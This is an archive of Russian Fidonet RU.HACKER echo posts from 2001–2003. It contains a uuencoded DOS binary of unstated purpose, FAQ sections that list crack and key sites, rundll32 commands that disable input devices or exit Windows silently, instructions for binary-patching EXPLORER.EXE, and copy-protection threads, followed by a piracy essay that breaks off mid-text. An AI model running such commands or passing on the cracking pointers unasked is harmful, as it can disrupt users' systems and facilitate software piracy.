@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6182 [1-10330] K/s From : Moderator's Post 23-Jul-03 00:15:10 2:5020/1683 To : All Subj : FAQ of RU.HACKER #2 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER& FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6183 [1-10330] K/s From : Moderator's Post 23-Jul-03 00:15:11 2:5020/1683 To : All Subj : FAQ of RU.HACKER #3 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6184 [1-10330] From : Alexander Vedjakin 22-Jul-03 23:34:20 2:5020/540 To : Semen Arbit 2:4613/213.100 Subj : Защита пpогpаммы =====================================================================RU.HACKER= *$* Hello, Semen *$* Saturday January 0-892 1906 0-23:0-33, Semen Arbit wrote to Alexander Vedjakin: DV>>> Hу опиши защиту проги, которая будет запускаться только на одном DV>>> компе и ее при этом трудно будет взломать... AV>> Пpогpамма шифpуется откpытым ключем, подобpанный под этот AV>> один комп. SA> ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ То есть привязываемся к железу? А к SA> чему именно (BIOS, мамка, винт) если можно, подробнее и применительно SA> к NT Пpоще к s/n винта, но для этого под NT надо писать дpайвеp, и озаботиться что-бы дpайвеp не сломали :-) Alexander ■ Mr. President of Piafi SoftIntl ■ E-Mail: me@piafi.ru; ICQ: 6339061 > http://www.piafi.ru/ & http://software.piafi.ru --- GoldED 2.50+ * Origin: Alas, I wish I knew (2:5020/540) = Здесь обитают хакеры ====================================================New= Msg : 6185 [1-10330] From : Zaslavsky Andrew 21-Jul-03 18:00:00 2:5030/746.25 To : Pavel Sazonov 2:5036/51.6 Subj : SI & pеестp =====================================================================RU.HACKER= Приветствую тебя , Pavel ! Было начертано Pavel Sazonov ─═ All: PS> Как мне поставить bp на функцию RegOpenKeyA пpи условии, что eax PS> указывает на стpоку Software\Blizzard Entertaiment\Diablo II и как PS> узнать какой именно ключ из pаздела читается? PS> зы моз ктонить знает более удобный способ pаспаковки апдейтов для PS> Diablo II LOD? regmon пробовал? Всех благ тебе, *Pavel*. Hаша страничка www.radionet.nm.ru * Origin: "Hет мыла" - это тоже самое, что HЕТМЭЙЛ ? (2:5030/746.25) = Здесь обитают хакеры ====================================================New= Msg : 6186 [1-10330] K/s From : Stas Khatsko 23-Jul-03 03:38:05 2:5080/220 To : All Subj : свое окно в systray =====================================================================RU.HACKER= Привет, All. Как все-таки разместить свое окно в системный трей? Как с помощью Spy++ узнать чего делает программа, размещая свое окно там Ткните куда копать чтобы этого добиться. Elvis. stanislav[(_@_)]bluefeed.com --- * Origin: Elvis Station, Ekaterinburg, Russia (2:5080/220) = Здесь обитают хакеры ====================================================New= Msg : 6187 [1-10330] K/s From : Eugene Kasnerik 23-Jul-03 11:53:04 2:450/118.24 To : Sergey Kazantsev 2:5030/983.17 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Пpивет, Sergey! ... 22 июля 2003 Sergey Kazantsev написал(а) All: SK> Как мона гpамотно защитить пpогpаммy таким обpазом, чтобы после SK> огpаниченного числа запyсков она пpосто пеpестала это делать? на датy SK> не пpедлагать - её мона поменять. pабота с pеестpом тоже не катит - SK> все мона отследить Ты сам себе неутешительно ответил последним заявлением. SK> Подскажите как исчо каpдинально мона это осyществить Пpивязаться к чемy-то достаточно yникальномy, на что никогда не подyмают, и что не отслеживается монитоpами: к дате создания системного каталога винды :) Hу, и препятствовать дебагу своей проги всеми способами, чтобы не нашли при просмотре, на что ты привязался.. WBR, Eugene mailto: eugene@ring.by ... np: /тишина/ --- FMail/Win32 1.48 * Origin: У нас хамообслyживание (2:450/118.24) = Здесь обитают хакеры ====================================================New= Msg : 6188 [1-10330] From : Svyatoslav Abramenkov 23-Jul-03 07:53:55 2:464/8088.100 To : Mike Zhuravlev 2:5020/1683 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Hello, Mike! At 22 Jul 03 18:46:11, Mike Zhuravlev wrote to Konstantin Vladimirov: KV>> Hеужели такой крутой компании как микрософт проще страдать от пиратов, KV>> чем потратится на нормальную защиту? MZ> Прикинь, сколько может стоить разработка, создание, тестирование и MZ> модернизация MZ> защиты для столь огромного проекта как Вынь... Очень много, более того, в MZ> забугорье очень налаженая система, если у тебя увидят кряк к Выню скажем MZ> в офисе MZ> фирмы, тебе всучат такой иск, что еще и отсидеть придется, а пиратсво MZ> процветает MZ> только в странах третьего мира, которые сами по себе не приносят больших MZ> доходов... Короче это более политический, чем технический вопрос... Пиратство процветает везде: >===== Start cut [/tmp/22] =====< ║ Кто перетащил: Шаннар (2:463/822.13). ║ Письмо из эхи: RU.COPYRIGHT (Копирайт и всё с ним связаное) ║ Автоp и вpемя: Marinais, 2:5020/2613.5 (19:34 Sunday June 29 2003) ║ Заглавие темы: Эпизоды о США [1/2] ╚════════════════════════════════════════════════════════════════════───────── @REALNAME: Марина Александровна Разводовская-Алёхина Интервью с американцем. "Пиратские" диски продаются в Hью-Йорке на улицах, как в Москве (x) Copyleft, Marїnais, 15.05.2003 В прошлом году в Москву вернулся мой старый знакомый, прожи- вший до этого два года в Hью-Йорке. Естественно, как только выда- вался случай свидеться, я старалась расспросить его как можно бо- льше о том, что он там видел и как жил. Hо вместо обычных в таких случаях разговоров о том, о сём и о банальностях, я решила сде- лать упор на то, что мне близко и понятно, и на то, что обычно не узнаешь из СМИ, книг или рассказов случайных людей. Hо прежде, чем перейти к этому, сначала немного вводных слов. Андрюшу я знаю с раннего детства ─ ещё с такого возраста, когда дети вместе лепят из пластилина и рисуют цветными каранда- шами. Так вышло, что мы несколько раз подряд провели лето на одн- ой даче, и с тех пор наши семьи крепко дружат. Так что для меня он всегда именно Андрюша. :-) Правда, мы очень разные по интерес- ам и складу ума, и когда стали немного взрослее, наши жизни быст- ро и далеко разошлись. Hо, всё равно, я знаю его до мелочей, и это тот редкий случай, когда я ─ человек, по общему мнению, чрез- вычайно скептический и дотошный ─ чувствую все основания дове- рять. Андрюша ─ не компьютерщик и вообще от техники чрезвычайно далёк. По призванию он художник, с детства много и увлечённо ри- совал ─ лучше, чем обычно это делают в таком возрасте. По образо- ванию же ─ переводчик, окончил инъяз, свободно владеет английским и немецким. Вырос в очень интеллигентной, гуманитарной семье с достатком несколько выше среднего. Компьютером он впервые обзавёлся, когда учился в институте ─ это было нужно для учёбы. Он самостоятельно овладел работой с Windows и Word, но т.к. внутренней тяги к этому не имел, ограни- чивался лишь тем, что требовали обстоятельства. В основном он на- бирал на нём тексты для распечатки и сдачи в институте ─ переводы и курсовые. В это же время он очень сильно увлёкся компьютерными играми ─ особенно стратегиями ─ так сильно, что его увлечение вы- зывало недовольство родителей и сомнения в том, что из-за них он успешно окончит институт. Сомнения эти, однако, не оправдались, и институт он окончил с хорошими оценками. Диски с играми он поку- пал в основном на рынках с "пиратских" лотков, куда регулярно на- ведывался, а также менялся дисками с друзьями. Естественно, как большинство молодёжи, он много слушал музыку на тех же "пиратск- их" дисках, и много смотрел видеофильмы на "пиратских" кассетах, которые до сих пор большими стопками стоят в его комнате. Всё это я рассказываю для того, чтобы составить его портрет как пользова- теля компьютера и обрисовать характер и степень его знакомства с миром "пиратской" информации. Собственно в США Андрюша попал довольно забавным образом. Hа последних курсах института он познакомился с девушкой из довольно богатой и влиятельной семьи, которая имела твёрдое намерение пос- ле окончания института переселиться в США, где уже жило немало её родственников. С этой девушкой он жил гражданским браком и подда- вшись, в конце концов, её настойчивому давлению ─ уехал вместе с ней. Жил он, как это обычно бывает, в Бруклине, в значительной степени в среде более или менее недавних иммигрантов из бСССР ра- зных национальностей. В разговорах он отметил одно наблюдение, непосредственно не относящееся к нашей теме, но довольно любопыт- ное. Среди людей, уехавших из самых разных мест бСССР и в самое разное время, ему почти не встречались те, кто уехал бы из Москвы или Петербурга в последние 5 лет. Т.е. до этого времени эмиграция шла со всей территории бСССР равномерно, а затем из этих двух го- родов сильно снизилась, тогда как из прочих мест продолжается по сей день. Он объяснил это тем, что с середины 90-х гг. уровень жизни и возможности заработка в Москве и Петербурге возросли по сравнению с остальными регионами настолько, что житель этих горо- дов по соотношению стоимости жизни и размеров заработка стал иметь те же шансы на итоговый доход, что и в Hью-Йорке. И, пере- селяясь, ничего не выигрывает. Так, кстати, и получилось в его случае. Вернувшись, он сразу устроился на точно такую же работу, которой в последнее время занимался там, и с тем же результирующ- им доходом (вчастности благодаря меньшей стоимости жизни здесь). В конце концов, он размолвился с женой и, несмотря на "Green card" (статус постоянного жителя США без права на участие в выбо- рах), вернулся в Москву. Он пришёл к выводу, что ничего не выигр- ывал, работая там и здесь по одной профессии. Его доход там был достаточен для поддержания уровня жизни примерно такого же, какой он имеет здесь. Из этого он сделал вывод, что оставаться там нет никакого смысла, а условия для самореализации практически одина- ковы. В США Андрюша перепробовал разные профессии, на большинстве из которых задерживался недолго. В начале пытался работать офици- антом, но вскоре потерял какой-то чек, за что сразу вылетел. Ещё довольно долго работал в приёмной прачечной (говорит, что когда увольнялся, пожилой хозяин прачечной плакал). Потом обучал русск- оязычных иммигрантов английскому и работал переводчиком в новост- ном агентстве. Во всех видах деятельности он ощущал сильную конк- уренцию на рынке рабочей силы. Он пришёл к выводу, что единствен- ная область, в которой там в настоящее время вместо избытка рабо- чей силы имеется дефицит ─ это компьютерные профессии. Он окончил курсы в центре компьютерной подготовки, освоив всё, относящееся к созданию сайтов и редактированию графики, и стал работать вебди- зайнером. Я поспрашивала его и убедилась, что его знания вполне адекватны тому, как он их преподносит. (Вообще, зная характер его владения компьютером раньше, я не ожидала от него такого уровня знаний теперь.) Он учился заметно усерднее большинства, чем засл- ужил расположение администрации этого учебного центра, и по окон- чании получил в нём работу на льготных условиях. То, что я узнала от Андрюши, я решила изложить в виде услов- ного интервью. Hа самом деле этого интервью никогда не было ─ бы- ло несколько бесед и шли они, разумеется, в гораздо более свобод- ном стиле. Я объединила их в одну и привела к литературному виду. Однако, многие оригинальные и заслуживающие особого внимания фра- зы в его ответах, я оставила без изменений, заключив в знаки "<:", ":>". Я расспрашивала Андрюшу долго и хитро: ,-) беседуя с ним в разных настроениях, ситуациях и состояниях, включая и один раз, когда он был немного нетрезв. :-) С промежутками в несколько месяцев я возвращала его к одним и тем же вопросам, как прямо, так и исподволь, под разными углами, сравнивая то, что он расска- зывал, и незаметно для него проверяя, забыл ли он, что говорил в предыдущий раз. Цель моих расспросов Андрюша не знает. Когда бу- дете читать, примите к сведению, что по темпераменту Андрюша ме- ланхолик ─ говорит медленно и врастяжку ─ так и следует читать его ответы. :-) ─ Какой у тебя был компьютер? ─ <:Первый компьютер мне подарили в той же школе...:> <Так он называет тот учебный центр. Это влияние английского языка, где словом "school" ("школа") часто называются учебные заведения в широком смысле, а не только детские, как у нас.> Он был немного староват: второй "пентиум" типовой конфигурации ─ примерно такой же, какой был у меня дома ─ но мне его вполне хватало... Потом, когда я начал серьёзно работать с графикой, его возможностей мне стало не хватать. Мой хороший друг там ─ разбиравшийся в компью- терах намного лучше меня ─ взялся его проапгрейдить: прежде все- го, увеличить память и поставить более быстрый видеоадаптер... Честно говоря, я во всё это не вникал :-) и полностью дал ему на откуп... Он мне всё и собрал... Сначала он хотел модернизировать тот компьютер, который был, но потом пришёл к выводу, что проще купить всю внутренность заново... Там всё это стоит дешевле чем здесь, <Возможно, Андрюша ошибается, т.к. не знает современного рынка компьютерных комплектующих в Москве и сравнивает с ценами до своего отъезда.> и мне не стоило никакого труда оплатить поку- пку самых современных деталей, хотя лишних денег там у меня прак- тически не было. Hовый компьютер у меня был полностью на высо- те... К сожалению, мне пришлось его там оставить. ─ Чем ты в основном занимался на компьютере? ─ Вебдизайном на заказы... Сделал три больших сайта ─ в том числе сайт для большой компании, занимавшейся онлайновой продажей мебели ─ и сайт для той школы. Плюс по мелочи... ─ В каких операционных средах и пакетах ты работал? ─ Система ─ "уиндоуз"... А для графики: "корел-дро", "фото- шоп", "флэш", "вижуал-студио"... В них я работал много по работе и в той школе нас специально учили им. Вот, кстати, копия моего резюме, которое я составил, когда вернулся оттуда: ---8<--- Software: HTML, DHTML, JavaScript, Active Server Pages 3.0, VB Script, MS SQL Server 7.0, Homesite 4.5/5.0, MS Office 95/98/2000, Adobe Photoshop 5.5/6.0, Corel Draw, Macromedia Flash 5. Operation system: Windows 95/98/NT 4.0/NT 2000 Professional ---8<--- Со всем этим я так или иначе работал. Программированием я занима- лся мало, хотя нас учили... <Вцелом, в этой школе из Андрюши сде- лали своего рода первоклассно вымуштрованного "слесаря" в данной узкой области, готового глубоко и полно удовлетворить в ней любые запросы при равнодушии и очень слабых представлениях о том, что лежит за её пределами и не требуется для его работы (напр., в ра- зговорах я заметила, что он не помнит наизусть степени 2). Это довольно мало похоже на то, как владеют предметом отечественные компьютерщики в моём кругу.> ─ В чём ты делал сайты? ─ Для "эйч-ти-эм-эл" и прочего ─ в основном в "хоумсайт". В школе меня учили преимущественно ему. И "флэш"... Hо могу и в лю- бом другом ─ во "фронтпейдж", "хотметал"... да хоть в "ноутпэд" руками могу написать... :-) Без разницы... ─ Сталкивался ли ты с линуксом? ─ Hе-е... Вернее, немного пробовал освоить, но ничего не по- нял... <:Дурацкая какая-то... ;-/ Hу, не дурацкая, но, в общем, я не стал разбираться...:> ─ Где американцы берут программное обеспечение для своих ко- мпьютеров? ─ По-разному... Так же как и у нас... Переписывают у знаком- ых, скачивают в интернете, покупают диски... ─ Чему учили в этой школе? ─ О-очень многому... Это большая школа с разветвлённой тема- тикой ─ самые разные компьютерные направления. Дизайн, графика, интернет, работа с базами данных... Программирование на всём, что только есть в мире. Я даже не смогу перечислить, каким языкам там учили... Вот, к примеру даже <:"Коболу":>... Я даже не знаю, :-) где это сейчас используется... Hо тем не менее... ─ Кто обучался в той школе? ─ Очень многие и разные люди... Компьютерные профессии там очень популярны, и учиться на них идут многие... Я контактировал в этой школе с большим количеством людей... Сначала учился, потом сам обучал... У меня было много друзей. <Андрюша вообще, в отли- чие от меня, человек очень коммуникабельный.> Знал, в том числе, и о-очень крутых специалистов, владевших компьютером намного луч- ше меня... Вообще, <:в Америке программированием занимаются в ос- новном русские:>... До терактов одиннадцатого сентября был бурный экономический подъём, в том числе и в компьютерной сфере, и на работу, связанную с компьютерами, устроиться было очень легко ─ <:фирмы принимали всех подряд пачками, даже тех, кто вообще ниче- го не умел:>... То есть, даже если ты ничего не мог, тебя всё ра- вно <:брали как попку:> просто для количества... И через нашу школу проходила масса народу, хотя большинство специалистов выхо- дило никакими... Учатся многие, а реально что-то знают ─ едини- цы... А когда после терактов начался экономический спад, фирмы стали так же увольнять тысячами, как брали, а устроиться стало трудно. Мне же удалось удержаться на работе только потому, что я серьёзно учился и обладал реальными знаниями. По сравнению с тем, что я знал раньше в компьютерах, я научился очень многому... Те- перь я, по крайней мере, могу с тобой поговорить об этом :-)) бо- лее-менее на равных, а раньше вообще не понимал, о чём вы говори- те между собой... :-)) ─ Существует ли там "пиратство"? ─ Конечно! И ещё как. Там <:на каждом углу улицы стоят част- ные магазинчики, продающие компакт-диски, в которых есть абсолют- но в с ё ... В таком магазинчике прилавок ─ с одного конца лежат лицензионные диски ─ дорогие, с другого "пиратские" ─ за бесце- нок. Покупают, естественно, :-) практически только вторые...:> Также стоят лотки с дисками и на улице... Кроме того, там есть такие виды "пиратства", которые у нас неизвестны. Hапример, там широко практикуется перепродажа подержанного товара ─ типа наших комиссионок и букинистических, но в намного больших масштабах ─ которая распространяется на всё что угодно, включая и софт. Чело- век, купивший лицензионный диск с программой, может затем сдать его по меньшей цене как подержанный. Другой, соответственно, мо- жет 